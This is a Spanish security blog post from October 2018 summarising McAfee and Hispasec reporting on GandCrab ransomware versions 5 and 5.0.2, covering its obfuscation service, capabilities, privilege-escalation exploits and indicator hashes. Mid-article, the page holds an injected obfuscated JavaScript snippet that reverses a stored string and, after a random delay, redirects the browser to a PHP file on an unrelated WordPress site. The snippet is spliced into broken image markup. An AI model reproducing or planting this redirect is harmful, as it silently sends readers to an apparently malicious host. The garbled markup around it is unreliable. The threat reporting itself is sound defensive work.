IMPORTANTE INFORMACIÓN SOBRE LAS ÚLTIMAS VARIANTES DEL RANSOMWARE GANDCRAB
VARIANTES RANSOMWARE GANDCRAB 5 y 5.02
Tras muchas variantes que vamos controlando de este ransomware con el ELISTARA, creemos importante hacernos eco de este artículo sobre la última variante de dicha familia, editado por nuestros compañeros de Hispasec:
total sobre la variante 5 de dicho ransomware GANDCRAB:
total sobre la variante 5.02 del GANDCRAB
Acceso a información de McAfee al respecto, en inglés original:
https://securingtomorrow.mcafee.com/mcafee-labs/rapidly-evolving-ransomware-gandcrab-version-5-partners-with-crypter-service-for-obfuscation/
______________________
GandCrab v5 evoluciona dificultando su desofuscación
GandCrab evoluciona asociándose con un servicio criptológico para ofuscar su código
El ransomware GandCrab apareció por primera vez en enero de este año y se ha ido actualizando muy rápidamente desde entonces, este mes ha llegado a su versión 5.0.2 mejorando el código y haciéndolo más resistentes a detecciones o eliminaciones.
Para la versión 5 los desarrolladores de GandCrab cuentan con el servicio NTCrypt un servicio dedicado a la ofuscación de malware que permite evadir los antivirus.
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tobqjO2lI/AAAAAAAAAgU/P9zR8zkXD_kYwHSlOpOfZeB6AS9hOnbhgCLcBGAs/s1600/20181010-Gandcrab-2.png” width=”1250″ height=”401″ /></p>
<p>Anuncio de asociación NTCrypt + GandCrab<br />
Fuente: securing<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
tomorrow.mcafee.com
Cómo todos los ransomware su objetivo principal es cifrar todos los archivos del sistema infectado y demandar una cantidad de cryptodivisas para poder recuperar los archivos (no hay garantía de que si se pague se recuperen los ficheros).
La versión 5 viene con las siguientes características:
Eliminación de archivos
Descubrimiento de información en el sistema objetivo
Ejecución a través de API
Ejecución a travésde WMIC
Detección de productos antimalware y de seguridad.
Modificación del registro
Descubrimiento de los arboles de directorio para buscar archivos a cifrar.
Descubrir recursos compartidos en red para cifrarlos
Enumeración de procesos para poder eliminar algunos concretos
Creación de archivos
Elevación de privilegio
Esta versión viene con dos exploits que intentan escalar privilegios en el sistema. Uno de ellos es el recientemente lanzado exploit que intenta usar un problema con el sistema de tareas de Windows cuando el sistema maneja incorrectamente las llamadas a un procedimiento local.
El otro exploit que ejecuta es una elevación de privilegios gracias a un objeto defectuoso en el token del proceso del sistema, cambiar este token permite al malware la ejecución del exploit y la escalada de privilegios en el sistema.
Hashes
e168e9e0f4f631bafc47ddf23c9848d7: Versión 5.0
6884e3541834cc5310a3733f44b38910: DLL de la versión 5.0
2d351d67eab01124b7189c02cff7595f: Versión 5.0.2
41c673415dabbfa63905ff273bdc34e9: Versión 5.0.2
1e8226f7b587d6cd7017f789a96c4a65: DLL exploit de 32 bits
fb25dfd638b1b3ca042a9902902a5ff9: DLL exploit de 64 bits
df1a09dd1cc2f303a8b3d5097e53400b: botnet relacionada con el malware (IP
92.63.197.48)
Ver información original al respecto en Fuente:
Saludos,
ms, 22-10-2018
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.